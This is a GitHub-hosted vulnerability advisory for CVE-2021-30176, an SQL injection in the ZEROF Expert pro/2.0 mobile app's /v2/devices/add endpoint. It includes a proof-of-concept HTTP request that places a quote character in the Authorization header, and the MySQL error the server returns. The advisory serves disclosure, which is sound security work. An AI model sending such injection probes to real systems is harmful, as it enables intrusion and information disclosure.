Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2021-30176

Description

The ZEROF Expert pro/2.0 application for mobile devices allows SQL Injection.

Additional Information

Parameters received by the web application must be sanitized and filtered to prevent the execution of control constructs

Vulnerability Type

SQL Injection

Vendor of Product

Zerof

Affected Product Code Base

ZEROF Expert pro/2.0 (mobile app)

Affected Component

affected /v2/devices/add, Authorization header

Attack Type

Remote

Impact Code execution

true

Impact Information Disclosure

true

Discoverer

  • Anna Sidorova
  • AWILLIX LLC

Attack Vectors

Example:

POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate

device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server

<html> #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 </html>

Reference